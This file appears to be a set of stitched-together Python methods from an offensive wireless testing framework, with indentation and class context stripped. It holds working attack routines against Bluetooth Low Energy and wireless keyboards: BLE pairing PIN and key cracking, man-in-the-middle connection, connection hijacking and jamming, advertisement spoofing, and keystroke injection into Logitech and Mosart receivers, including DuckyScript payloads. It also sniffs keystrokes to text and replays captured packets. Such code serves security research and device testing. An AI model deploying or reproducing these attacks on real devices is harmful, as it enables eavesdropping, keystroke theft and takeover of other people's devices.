def run(self):
interface = self.args["INTERFACE"]
self.emitter = self.getEmitter(interface=interface)
if self.checkCapabilities():
if self.emitter.isConnected():
self.emitter.sendp(ble.BLEDisconnect())
while self.emitter.isConnected():
utils.wait(seconds=0.01)
address = (self.emitter.getAddress()
if self.args["ADVERTISING_ADDRESS"] == "" else
utils.addressArg(self.args["ADVERTISING_ADDRESS"]))
if address != self.emitter.getAddress():
self.emitter.setAddress(address)
if utils.isHexadecimal(self.args["SCANNING_DATA"]):
scanningData = bytes.fromhex(self.args["SCANNING_DATA"])
else:
scanningData = b""
if utils.isHexadecimal(self.args["ADVERTISING_DATA"]):
advertisingData = bytes.fromhex(self.args["ADVERTISING_DATA"])
else:
advertisingData = b""
destAddress = ("00:00:00:00:00:00"
if self.args["DESTINATION_ADDRESS"] == "" else
utils.addressArg(self.args["DESTINATION_ADDRESS"]))
intervalMin = utils.integerArg(self.args["INTERVAL_MIN"])
intervalMax = utils.integerArg(self.args["INTERVAL_MAX"])
advertisingType = self.args["ADVERTISING_TYPE"].upper()
advertisingAddressType = "public" if self.args[
"ADVERTISING_ADDRESS_TYPE"].lower() == "public" else "random"
destinationAddressType = "public" if self.args[
"DESTINATION_ADDRESS_TYPE"].lower() == "public" else "random"
self.emitter.setScanningParameters(data=scanningData)
self.emitter.setAdvertisingParameters(
type=advertisingType,
destAddr=destAddress,
data=advertisingData,
intervalMin=intervalMin,
intervalMax=intervalMax,
daType=advertisingAddressType,
oaType=destinationAddressType)
self.emitter.setAdvertising(
enable=utils.booleanArg(self.args["ENABLE"]))
time = utils.integerArg(
self.args['TIME']) if self.args["TIME"] != "" else -1
while time != 0:
utils.wait(seconds=1)
time -= 1
return self.ok({"INTERFACE": self.args["INTERFACE"]})
else:
io.fail("Interface provided (" + str(self.args["INTERFACE"]) +
") is not able to send advertisements.")
return self.nok()
def run(self):
if self.checkParametersValidity():
self.mRand = bytes.fromhex(self.args["MASTER_RAND"])
self.sRand = bytes.fromhex(self.args["SLAVE_RAND"])
self.pReq = bytes.fromhex(self.args["PAIRING_REQUEST"])
self.pRes = bytes.fromhex(self.args["PAIRING_RESPONSE"])
self.initiatorAddress = utils.addressArg(
self.args["INITIATOR_ADDRESS"])
self.responderAddress = utils.addressArg(
self.args["RESPONDER_ADDRESS"])
self.initiatorAddressType = b"\x00" if self.args[
"INITIATOR_ADDRESS_TYPE"] == "public" else b"\x01"
self.responderAddressType = b"\x00" if self.args[
"RESPONDER_ADDRESS_TYPE"] == "public" else b"\x01"
self.mConfirm = bytes.fromhex(self.args["MASTER_CONFIRM"])
self.sConfirm = bytes.fromhex(self.args["SLAVE_CONFIRM"])
rand = self.mRand if self.mRand != b"" and self.mConfirm != b"" else self.sRand
confirm = self.mConfirm if self.mRand != b"" and self.mConfirm != b"" else self.sConfirm
io.info("Cracking TK ...")
pin = ble.BLECrypto.crackTemporaryKey(rand, self.pReq, self.pRes,
self.initiatorAddressType,
self.initiatorAddress,
self.responderAddressType,
self.responderAddress,
confirm)
io.success("Pin found : " + str(pin))
self.temporaryKey = bytes.fromhex((32 - len(hex(pin)[2:])) * "0" +
hex(pin)[2:])
io.success("Temporary Key found : " + self.temporaryKey.hex())
if self.mRand != b"" and self.sRand != b"":
self.shortTermKey = ble.BLECrypto.s1(self.temporaryKey,
self.mRand,
self.sRand)[::-1]
io.success("Short Term Key found : " + self.shortTermKey.hex())
return self.ok({
"PIN": str(pin),
"TEMPORARY_KEY": self.temporaryKey.hex(),
"SHORT_TERM_KEY": self.shortTermKey.hex()
})
return self.ok({
"PIN": str(pin),
"TEMPORARY_KEY": self.temporaryKey.hex()
})
else:
io.fail("Missing parameters !")
return self.nok()
def connect(self, packet):
if self.getStage() == BLEMitmStage.WAIT_CONNECTION:
io.success("Master connected : " + packet.srcAddr)
self.initiatorAddress = packet.srcAddr
self.initiatorAddressType = b"\x00" if packet.type == "public" else b"\x01"
if self.args["ADVERTISING_STRATEGY"] == "preconnect":
if utils.booleanArg(self.args["MASTER_SPOOFING"]):
self.a2sEmitter.sendp(ble.BLEDisconnect())
while self.a2sEmitter.isConnected():
utils.wait(seconds=0.01)
self.a2sEmitter.setAddress(packet.srcAddr,
random=packet.type == "random")
address = utils.addressArg(self.args["TARGET"])
connectionType = self.args["CONNECTION_TYPE"]
io.info("Connecting to slave " + address + "...")
self.a2sEmitter.sendp(
ble.BLEConnect(dstAddr=address,
type=connectionType,
initiatorType=packet.type))
while not self.a2sEmitter.isConnected():
utils.wait(seconds=0.01)
if self.args["ADVERTISING_STRATEGY"] == "flood":
if utils.booleanArg(self.args["MASTER_SPOOFING"]):
self.a2sEmitter.setAddress(packet.srcAddr,
random=packet.type == "random")
self.connectOnSlave(packet.type)
self.setStage(BLEMitmStage.ACTIVE_MITM)
io.info("Entering ACTIVE_MITM stage ...")
def keyDistribution(self, type="initiator"):
if type == "initiator":
keyDistribution = self.initiatorKeyDistribution
else:
keyDistribution = self.responderKeyDistribution
if keyDistribution.encKey:
io.info("Sending LTK...")
self.emitter.sendp(
ble.BLEEncryptionInformation(
ltk=bytes.fromhex(self.args["LTK"])[::-1]))
self.emitter.sendp(
ble.BLEMasterIdentification(
ediv=utils.integerArg(self.args["EDIV"]),
rand=bytes.fromhex(self.args["RAND"])))
io.success("Sent !")
if keyDistribution.idKey:
io.info("Sending IRK...")
self.emitter.sendp(
ble.BLEIdentityInformation(
irk=bytes.fromhex(self.args["IRK"])[::-1]))
self.emitter.sendp(
ble.BLEIdentityAddressInformation(
address=utils.addressArg(self.args["ADDR"]),
type=self.args["ADDR_TYPE"].lower()))
io.success("Sent !")
if keyDistribution.signKey:
io.info("Sending CSRK...")
self.emitter.sendp(
ble.BLESigningInformation(
csrk=bytes.fromhex(self.args["CSRK"])[::-1]))
io.success("Sent !")
def updateDevices(self):
changes = 0
while not self.devicesQueue.empty():
device = self.devicesQueue.get()
if (self.args["TARGET"] == "" or utils.addressArg(self.args["TARGET"])==device["address"]):
if device["address"] not in self.devices:
changes += 1
self.devices[device["address"]] = {
"name":device["name"],
"company":device["company"],
"flags":device["flags"],
"ADV_IND_data":device["data"] if device["pType"]=="ADV_IND" else "",
"SCAN_RSP_data":device["data"] if device["pType"]=="SCAN_RSP" else ""
}
else:
if self.devices[device["address"]]["name"] != device["name"] and device["name"]!="":
changes += 1
self.devices[device["address"]]["name"] = device["name"]
if self.devices[device["address"]]["company"] != device["company"] and device["company"]!="":
changes += 1
self.devices[device["address"]]["company"] = device["company"]
if self.devices[device["address"]]["ADV_IND_data"] != device["data"] and device["data"]!="" and device["pType"]=="ADV_IND":
changes += 1
self.devices[device["address"]]["ADV_IND_data"] = device["data"]
if self.devices[device["address"]]["SCAN_RSP_data"] != device["data"] and device["data"]!="" and device["pType"]=="SCAN_RSP":
changes += 1
self.devices[device["address"]]["SCAN_RSP_data"] = device["data"]
if self.devices[device["address"]]["flags"] != device["flags"] and len(device["flags"])>=len(self.devices[device["address"]]["flags"]):
changes += 1
self.devices[device["address"]]["flags"] = device["flags"]
if changes > 0:
self.displayDevices()
def show(self,packet):
advMode = self.args["SNIFFING_MODE"].upper() == "advertisements".upper()
isAnAdv = isinstance(packet, ble.BLEAdvertisement)
isAnEmpty = isinstance(packet,ble.BLEEmptyPDU)
unknownInName = "Unknown" in packet.name
isConnectReq = isinstance(packet,ble.BLEConnectRequest)
addressMatching = ( isConnectReq
and packet.addr == utils.addressArg(self.args["TARGET"])
or self.args["TARGET"] == ""
or (hasattr(packet,"addr") and packet.addr == utils.addressArg(self.args["TARGET"])))
if (
(not advMode and (not isAnAdv or isConnectReq) and not isAnEmpty and not unknownInName)
or (advMode and isAnAdv and addressMatching)
):
self.onPacket(packet)
if self.pcap is not None:
self.pcap.sendp(packet)
if utils.booleanArg(self.args["CRACK_KEY"]):
if isConnectReq:
self.initiatorAddress = packet.srcAddr
self.initiatorAddressType = packet.srcAddrType
self.responderAddress = packet.dstAddr
self.responderAddressType = packet.dstAddrType
if isinstance(packet, ble.BLEPairingRequest):
self.pReq = packet.payload[::-1]
if isinstance(packet,ble.BLEPairingResponse):
self.pRes = packet.payload[::-1]
if isinstance(packet,ble.BLEPairingConfirm) and self.mConfirm is None:
self.mConfirm = packet.confirm[::-1]
if isinstance(packet,ble.BLEPairingRandom) and self.mRand is not None and self.sRand is None:
self.sRand = packet.random[::-1]
while self.temporaryKey is None and not self.failure:
pass
if self.failure:
self.errorDuringCracking()
else:
io.info("Derivating Short Term Key ...")
self.shortTermKey = ble.BLECrypto.s1(self.temporaryKey,self.mRand,self.sRand)[::-1]
io.success("Short Term Key found : "+ self.shortTermKey.hex())
ble.BLELinkLayerCrypto.provideLTK(self.shortTermKey)
if isinstance(packet,ble.BLEPairingRandom) and self.mRand is None:
self.mRand = packet.random[::-1]
self.failure = not self.crackTemporaryKey()
def scanStage(self,packet):
if utils.booleanArg(self.args["SHOW_SCANNING"]):
packet.show()
if self.getStage() == BLEMitmStage.SCAN:
if utils.addressArg(self.args["TARGET"]) == packet.addr.upper():
if packet.type == "ADV_IND":
io.success("Found corresponding advertisement !")
self.address = utils.addressArg(self.args["TARGET"])
data = packet.getRawDatas()
self.intervalMin = packet.intervalMin
self.intervalMax = packet.intervalMax
self.addrType = packet.addrType
self.dataAdvInd = data
elif packet.type == "SCAN_RSP":
self.dataScanRsp = packet.getRawDatas()
if self.dataAdvInd is not None and self.dataScanRsp is not None:
self.cloneStage(self.address,self.dataAdvInd,self.dataScanRsp,self.intervalMin,self.intervalMax,self.addrType)
def run(self):
if self.args["PCAP_FILE"] != "":
self.pcap = self.getEmitter(self.args["PCAP_FILE"])
else:
self.pcap = None
self.initEmittersAndReceivers()
if self.args["LTK"] != "":
ble.BLELinkLayerCrypto.provideLTK(bytes.fromhex(self.args["LTK"]))
if utils.booleanArg(self.args["HIJACKING"]) and not self.checkHijackingCapabilities():
io.fail("Interfaces provided are not able to hijack a connection.")
return self.nok()
if utils.booleanArg(self.args["JAMMING"]) and not self.checkJammingCapabilities():
io.fail("Interfaces provided are not able to jam a connection.")
return self.nok()
if self.args["SNIFFING_MODE"].upper() == "newConnections".upper():
if self.checkNewConnectionCapabilities():
target = "FF:FF:FF:FF:FF:FF" if self.args["TARGET"] == "" else utils.addressArg(self.args["TARGET"])
return self.sniffNewConnections(target, utils.integerArg(self.args["CHANNEL"]))
else:
io.fail("Interfaces provided are not able to sniff new connections.")
return self.nok()
elif self.args["SNIFFING_MODE"].upper() == "existingConnections".upper():
if self.checkExistingConnectionCapabilities():
accessAddress = utils.integerArg(self.args["ACCESS_ADDRESS"]) if self.args["ACCESS_ADDRESS"]!="" else None
crcInit = utils.integerArg(self.args["CRC_INIT"]) if self.args["CRC_INIT"]!="" else None
channelMap = utils.integerArg(self.args["CHANNEL_MAP"]) if self.args["CHANNEL_MAP"]!="" else None
return self.sniffExistingConnections(self.receivers[0], accessAddress, crcInit, channelMap)
else:
io.fail("Interfaces provided are not able to sniff existing connections.")
return self.nok()
elif self.args["SNIFFING_MODE"].upper() == "advertisements".upper():
if self.checkAdvertisementsCapabilities():
target = "FF:FF:FF:FF:FF:FF" if self.args["TARGET"] == "" else utils.addressArg(self.args["TARGET"])
return self.sniffAdvertisements(target, utils.integerArg(self.args["CHANNEL"]))
else:
io.fail("Interfaces provided are not able to sniff advertisements.")
return self.nok()
return self.ok()
def onStart(self):
self.emitter = self.module.emitter
self.receiver = self.module.receiver
self.target = utils.addressArg(self.module.target)
self.lock = Lock()
io.info("Following mode disabled by the scenario.")
self.module.stopFollowing()
io.info("Generating attack stream ...")
attackStream = self.startLogitechInjection()
self.mode = None
if "TEXT" in self.module.args and self.module.args["TEXT"] != "":
self.mode = "text"
text = self.module.args["TEXT"]
io.info("Text injection: "+text)
attackStream += self.addLogitechDelay(duration=100)
attackStream += self.addLogitechText(text)
elif "INTERACTIVE" in self.module.args and utils.booleanArg(self.module.args["INTERACTIVE"]):
self.mode = "interactive"
io.info("Interactive mode")
self.keepAliveThread = wireless.StoppableThread(self.keepAlive)
self.keepAliveThread.start()
elif "DUCKYSCRIPT" in self.module.args and self.module.args["DUCKYSCRIPT"] != "":
self.mode = "duckyscript"
io.info("Duckyscript injection: "+self.module.args["DUCKYSCRIPT"])
parser = parsers.DuckyScriptParser(filename=self.args["DUCKYSCRIPT"])
attackStream = parser.generatePackets(
textFunction=self.addLogitechText,
initFunction=self.startLogitechInjection,
keyFunction=self.addLogitechKeystroke,
sleepFunction=self.addLogitechDelay
)
else:
io.fail("You must provide one of the following parameters:\n\tINTERACTIVE : live keystroke injection\n\tTEXT : simple text injection\n\tDUCKYSCRIPT : duckyscript injection")
self.module.stopScenario()
return True
io.info("Looking for target "+str(self.target)+"...")
while not self.emitter.scan():
utils.wait(seconds=0.1)
io.success("Target found !")
io.info("Injecting ...")
self.emitter.sendp(*attackStream)
if self.mode != "interactive":
while not self.emitter.isTransmitting():
utils.wait(seconds=0.5)
while self.emitter.isTransmitting():
utils.wait(seconds=0.5)
self.module.stopScenario()
return True
def run(self):
self.emitter = self.getEmitter(interface=self.args["INTERFACE"])
self.receiver = self.getReceiver(interface=self.args["INTERFACE"])
if self.checkInjectingCapabilities():
self.pcapReceiver = self.getReceiver(interface=self.args["PCAP_FILE"])
self.target = "FF:FF:FF:FF:FF" if self.args["TARGET"] == "" else utils.addressArg(self.args["TARGET"])
if self.target == "FF:FF:FF:FF:FF" and not self.checkPassiveScanningCapabilities():
io.fail("Interface provided ("+str(self.args["INTERFACE"])+") is not able to scan in promiscuous mode, you have to provide a specific target.")
return self.nok()
if self.target != "FF:FF:FF:FF:FF" and self.args["CHANNEL"].lower() == "auto" and not self.checkActiveScanningCapabilities():
io.fail("Interface provided ("+str(self.args["INTERFACE"])+") is not able to perform an active scan.")
return self.nok()
if self.target == "FF:FF:FF:FF:FF":
io.info("Promiscuous mode enabled ! Every frame contained in the file indicated in PCAP_FILE will be transmitted.")
self.emitter.enterPromiscuousMode()
else:
io.info("Sniffing mode enabled !")
self.emitter.enterSnifferMode(address=self.target)
if utils.isNumber(self.args["CHANNEL"]):
self.emitter.setChannel(utils.integerArg(self.args["CHANNEL"]))
elif self.args["CHANNEL"].lower() == "auto":
self.searchChannel()
else:
io.fail("A channel must be provided in order to perform an injection.")
return self.nok()
io.info("Extracting packet stream from PCAP ...")
stream = self.pcapReceiver.generateStream()
io.success("Packet stream successfully extracted !")
io.info("Injecting ...")
self.emitter.sendp(*stream)
while not self.emitter.isTransmitting():
utils.wait(seconds=0.1)
while self.emitter.isTransmitting():
utils.wait(seconds=0.1)
io.success("Injection done !")
return self.ok()
else:
io.fail("Interface provided ("+str(self.args["INTERFACE"])+") is not able to inject.")
return self.nok()
def run(self):
self.receiver = self.getReceiver(interface=self.args["INTERFACE"])
self.emitter = self.getEmitter(interface=self.args["INTERFACE"])
if self.checkCapabilities():
self.receiver.enterSnifferMode(
utils.addressArg(self.args["TARGET"]))
if self.checkInjectionSyncCapabilities():
if utils.booleanArg(self.args["SYNC"]):
self.receiver.enableSync()
else:
self.receiver.disableSync()
else:
io.warning(
"Synchronized injection is not supported by this interface, the SYNC parameter will be ignored ..."
)
self.receiver.setChannel(utils.integerArg(self.args["CHANNEL"]))
if self.args["TEXT"] != "":
keystrokes = self.addMosartText(self.args["TEXT"])
self.emitter.sendp(*keystrokes)
while not self.emitter.isTransmitting():
utils.wait(seconds=0.1)
while self.emitter.isTransmitting():
utils.wait(seconds=0.1)
elif self.args["DUCKYSCRIPT"] != "":
parser = DuckyScriptParser(filename=self.args["DUCKYSCRIPT"])
keystrokes = parser.generatePackets(
textFunction=self.addMosartText,
initFunction=self.startMosartInjection,
keyFunction=self.addMosartKeystroke,
sleepFunction=self.addMosartDelay)
self.emitter.sendp(*keystrokes)
while not self.emitter.isTransmitting():
utils.wait(seconds=0.1)
while self.emitter.isTransmitting():
utils.wait(seconds=0.1)
elif utils.booleanArg(self.args["INTERACTIVE"]):
self.stop = False
self.watchKeyboard()
while not self.stop:
utils.wait(seconds=0.5)
return self.ok()
else:
io.fail("Interface provided (" + str(self.args["INTERFACE"]) +
") is not able to inject frames and run in sniffing mode.")
return self.nok()
def jamAdvertisements(self):
if self.checkAdvertisementsJammingCapabilities():
channel = utils.integerArg(self.args["CHANNEL"])
if self.args["TARGET"] != "":
target = utils.addressArg(self.args["TARGET"])
pattern = bytes.fromhex(target.replace(":", ""))[::-1]
offset = 2
elif (utils.isNumber(self.args["OFFSET"])
and utils.isHexadecimal(self.args["PATTERN"])
and self.args["OFFSET"] != ""
and self.args["PATTERN"] != ""):
pattern = bytes.fromhex(self.args["PATTERN"])
offset = utils.integerArg(self.args["OFFSET"])
else:
io.fail(
"You must provide a dewhitened pattern and an offset, or a target to jam."
)
return self.nok()
if len(self.emitters) == 1:
self.emitters[0].jamAdvertisements(pattern=pattern,
offset=offset,
channel=channel)
if len(self.emitters) == 2:
self.emitters[0].jamAdvertisements(pattern=pattern,
offset=offset,
channel=channel)
self.emitters[1].jamAdvertisements(
pattern=pattern,
offset=offset,
channel=(channel + 1 if channel < 39 else 37))
if len(self.emitters) == 3:
self.emitters[0].jamAdvertisements(pattern=pattern,
offset=offset,
channel=37)
self.emitters[1].jamAdvertisements(pattern=pattern,
offset=offset,
channel=38)
self.emitters[2].jamAdvertisements(pattern=pattern,
offset=offset,
channel=39)
while True:
utils.wait(seconds=0.01)
else:
io.fail("Interfaces provided are not able to jam advertisements.")
return self.nok()
def connectOnSlave(self, initiatorType="public"):
while self.a2sEmitter.getMode() != "NORMAL":
utils.wait(seconds=1)
print(self.a2sEmitter.getMode())
address = utils.addressArg(self.args["TARGET"])
connectionType = self.args["CONNECTION_TYPE"]
self.responderAddress = address
self.responderAddressType = b"\x00" if self.args[
"CONNECTION_TYPE"] == "public" else b"\x01"
io.info("Connecting to slave " + address + "...")
self.a2sEmitter.sendp(
ble.BLEConnect(dstAddr=address,
type=connectionType,
initiatorType=initiatorType))
while not self.a2sEmitter.isConnected():
utils.wait(seconds=0.5)
io.success("Connected on slave : " +
self.a2sReceiver.getCurrentConnection())
def run(self):
self.receiver = self.getReceiver(interface=self.args["INTERFACE"])
self.emitter = self.getEmitter(interface=self.args["INTERFACE"])
if self.checkCapabilities():
self.receiver.enterSnifferMode(
utils.addressArg(self.args["TARGET"]))
if self.checkInjectionSyncCapabilities():
if utils.booleanArg(self.args["SYNC"]):
self.receiver.enableSync()
else:
self.receiver.disableSync()
else:
io.warning(
"Synchronized injection is not supported by this interface, the SYNC parameter will be ignored ..."
)
self.pcapReceiver = self.getReceiver(
interface=self.args["PCAP_FILE"])
self.receiver.setChannel(utils.integerArg(self.args["CHANNEL"]))
io.info("Extracting packet stream from PCAP ...")
stream = self.pcapReceiver.generateStream()
io.success("Packet stream successfully extracted !")
io.info("Injecting ...")
self.emitter.sendp(*stream)
while not self.emitter.isTransmitting():
utils.wait(seconds=0.1)
while self.emitter.isTransmitting():
utils.wait(seconds=0.1)
io.success("Injection done !")
return self.ok()
else:
io.fail("Interface provided (" + str(self.args["INTERFACE"]) +
") is not able to inject frames and run in sniffing mode.")
return self.nok()
def run(self):
self.receiver = self.getReceiver(interface=self.args["INTERFACE"])
self.receiver.enterSnifferMode(utils.addressArg(self.args["TARGET"]))
if self.checkSniffingCapabilities():
self.receiver.onEvent("MosartKeyboardKeystrokePacket",callback=self.show)
self.receiver.setChannel(utils.integerArg(self.args["CHANNEL"]))
try:
time = utils.integerArg(self.args['TIME']) if self.args["TIME"] != "" else None
start = utils.now()
while utils.now() - start <= time if time is not None else True:
utils.wait(seconds=0.5)
except KeyboardInterrupt:
self.exportTextFile()
self.receiver.removeCallbacks()
return self.ok({"TEXT":self.text})
self.exportTextFile()
self.receiver.removeCallbacks()
return self.ok({"TEXT":self.text})
else:
io.fail("Interface provided ("+str(self.args["INTERFACE"])+") is not able to run in sniffing mode.")
return self.nok()
def run(self):
if self.args["PCAP_FILE"] != "":
self.pcap = self.getEmitter(self.args["PCAP_FILE"])
else:
self.pcap = None
self.initEmittersAndReceivers()
if self.args["LTK"] != "":
ble.BLELinkLayerCrypto.provideLTK(bytes.fromhex(self.args["LTK"]))
if utils.booleanArg(self.args["HIJACKING_MASTER"]) and not self.checkHijackingMasterCapabilities():
io.fail("Interfaces provided are not able to hijack a master role.")
return self.nok()
if utils.booleanArg(self.args["HIJACKING_SLAVE"]) and not self.checkHijackingSlaveCapabilities():
io.fail("Interfaces provided are not able to hijack a slave role.")
return self.nok()
if utils.booleanArg(self.args["MITMING"]) and not self.checkMitmingCapabilities():
io.fail("Interfaces provided are not able to MITM an established connection.")
return self.nok()
if utils.booleanArg(self.args["JAMMING"]) and not self.checkJammingCapabilities():
io.fail("Interfaces provided are not able to jam a connection.")
return self.nok()
if self.args["SNIFFING_MODE"] not in ("newConnections", "advertisements", "existingConnections"):
io.fail("You have to set SNIFFING_MODE parameters to: 'newConnections', 'advertisements' or 'existingConnections'")
return self.nok()
if self.args["SNIFFING_MODE"].upper() == "newConnections".upper():
if self.checkNewConnectionCapabilities():
target = "FF:FF:FF:FF:FF:FF" if self.args["TARGET"] == "" else utils.addressArg(self.args["TARGET"])
if self.loadScenario():
io.info("Scenario loaded !")
self.startScenario()
result = self.sniffNewConnections(target, utils.integerArg(self.args["CHANNEL"]))
if self.scenarioEnabled:
self.endScenario()
return result
else:
io.fail("Interfaces provided are not able to sniff new connections.")
return self.nok()
elif self.args["SNIFFING_MODE"].upper() == "existingConnections".upper():
if self.checkExistingConnectionCapabilities():
if self.loadScenario():
io.info("Scenario loaded !")
self.startScenario()
accessAddress = utils.integerArg(self.args["ACCESS_ADDRESS"]) if self.args["ACCESS_ADDRESS"]!="" else None
crcInit = utils.integerArg(self.args["CRC_INIT"]) if self.args["CRC_INIT"]!="" else None
channelMap = utils.integerArg(self.args["CHANNEL_MAP"]) if self.args["CHANNEL_MAP"]!="" else None
result = self.sniffExistingConnections(self.receivers[0], accessAddress, crcInit, channelMap)
if self.scenarioEnabled:
self.endScenario()
return result
else:
io.fail("Interfaces provided are not able to sniff existing connections.")
return self.nok()
elif self.args["SNIFFING_MODE"].upper() == "advertisements".upper():
if self.checkAdvertisementsCapabilities():
if self.loadScenario():
io.info("Scenario loaded !")
self.startScenario()
target = "FF:FF:FF:FF:FF:FF" if self.args["TARGET"] == "" else utils.addressArg(self.args["TARGET"])
result = self.sniffAdvertisements(target, utils.integerArg(self.args["CHANNEL"]))
if self.scenarioEnabled:
self.endScenario()
return result
else:
io.fail("Interfaces provided are not able to sniff advertisements.")
return self.nok()
return self.ok()
